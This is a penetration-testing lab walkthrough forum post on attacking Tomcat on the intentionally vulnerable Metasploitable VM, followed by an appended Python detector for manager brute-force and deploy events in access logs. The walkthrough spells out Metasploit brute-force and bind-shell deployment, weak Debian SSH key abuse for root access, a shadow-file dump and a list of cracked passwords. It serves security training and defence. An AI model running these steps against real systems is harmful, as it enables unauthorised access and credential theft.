
Thread: [Video] Metasploitable - TomCat


    #1 g0tmi1k (Moderator, Join Date: Feb 2010)

    [Video] Metasploitable - TomCat

    Watch video on-line:
    Download video:
    Download usernames.lst:
    Download passwords.lst:
    Download (debian_ssh_rsa_2048_x86.tar.bz2): debian_ssh_rsa_2048_x86.tar.bz2

    What is this?
    This video demonstrates an attack on the TomCat service on the metasploitable hackable box.

    "Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." -

    "Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process." -

    > Use Nmap to scan the network (gathering information)
    > Use Nmap to do a more detailed scan of the target (gathering information)
    > Use Metasploit to brute force the login (gaining access)
    > Use Metasploit to send a payload (remote access)
    > *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
    > Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
    > Connect via SSH as root (complete access)
    > Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)

    What do I need?

    > Nmap --- on Backtrack 4 (Final)
    > Metasploit --- on Backtrack 4 (Final)
    > SSH --- on Backtrack 4 (Final)
    > John The Ripper --- on BackTrack!
    > Dictionaries/Word-lists --- Usernames Passwords
    > Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) ---
    > Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
    > Metasploitable.part01.rar (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
    > Metasploitable.part02.rar (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
    > Metasploitable.part03.rar (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
    > Metasploitable.part04.rar (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)

    nmap -sV -sS -O -f -n
    search tomcat
    use scanner/http/tomcat_mgr_login
    show options
    setg RHOSTS
    setg RPORT 8180
    set USER_FILE /root/usernames.lst
    set PASS_FILE /root/passwords.lst
    use multi/http/tomcat_mgr_deploy
    show options
    setg USERNAME tomcat
    setg PASSWORD tomcat
    show payloads
    set payload generic/shell_bind_tcp
    show options
    ls -lart /root
    ls -lart /root/.ssh
    cat /root/.ssh/authorized_keys
    firefox -> -> Debian OpenSSL Predictable (5720) ->
    tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
    cd rsa/2048
    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
    ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@
    cat /etc/shadow
    kate -> Paste -> Save (Filename: /root/shadow)
    ./john --rules --wordlist=/pentest/passwords/wordlists/darkc0de.lst
    ssh msfadmin@
    ------------------------------------------------------------------------------------
    root:             = root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
    sys:batman        = sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
    klog:123456789    = klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
    msfadmin:msfadmin = msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
    postgres:postgres = postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
    user:user         = user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
    service:service   = service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::


    Song: Underworld - Cowgirl
    Video length: 7:07
    Capture length: 11:17

    Blog Post:
    Forum Post:
    Last edited by g0tmi1k; 03-05-2011 at 02:05 PM.
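From the defender's side, the manager brute force and WAR deploy shown in the walkthrough leave a distinctive trail in Tomcat's access log. This added example (not code from the video or the post) parses constructed common-log-format lines and flags a burst of 401s to /manager/*, a 200 from the same source afterwards, and a deploy request; the sample lines, IPs, timestamps and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the common log format Tomcat's AccessLogValve writes.
# The "tomcat" account and manager paths mirror the walkthrough; IPs and times are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2011:14:02:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [05/Mar/2011:14:02:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [05/Mar/2011:14:02:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [05/Mar/2011:14:02:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [05/Mar/2011:14:02:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - tomcat [05/Mar/2011:14:02:03 +0000] "GET /manager/html HTTP/1.1" 200 17234
10.0.0.5 - tomcat [05/Mar/2011:14:02:04 +0000] "PUT /manager/deploy?path=/Xk3 HTTP/1.1" 200 52
10.0.0.9 - admin [05/Mar/2011:14:10:00 +0000] "GET /manager/html HTTP/1.1" 200 17234
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')

def parse_line(line):
    # One access-log record as a dict, or None for a line that does not parse.
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def detect_manager_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return (ip, kind, detail) alerts: `threshold` 401s to /manager/* from one IP
    inside `window`, then a 200 from that IP, then a deploy/upload by that IP."""
    failures, bruteforced, alerts = defaultdict(list), set(), []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/manager/"):
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["status"] == 401:
            failures[ip] = [t for t in failures[ip] if ts - t <= window] + [ts]
            if len(failures[ip]) == threshold:          # fire once per burst
                alerts.append((ip, "bruteforce", f"{threshold} 401s within {window.seconds}s"))
                bruteforced.add(ip)
        elif rec["status"] == 200 and ip in bruteforced:
            if rec["method"] == "PUT" or "/deploy" in rec["path"] or "/upload" in rec["path"]:
                alerts.append((ip, "deploy_after_bruteforce", f"{rec['method']} {rec['path']} as {rec['user']}"))
            else:
                alerts.append((ip, "login_after_bruteforce", f"authenticated as {rec['user']}"))
    return alerts
```

On the sample above the detector reports the 401 burst, the successful login as tomcat, and the PUT to /manager/deploy, all from 10.0.0.5, while the unrelated admin login from 10.0.0.9 stays quiet.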
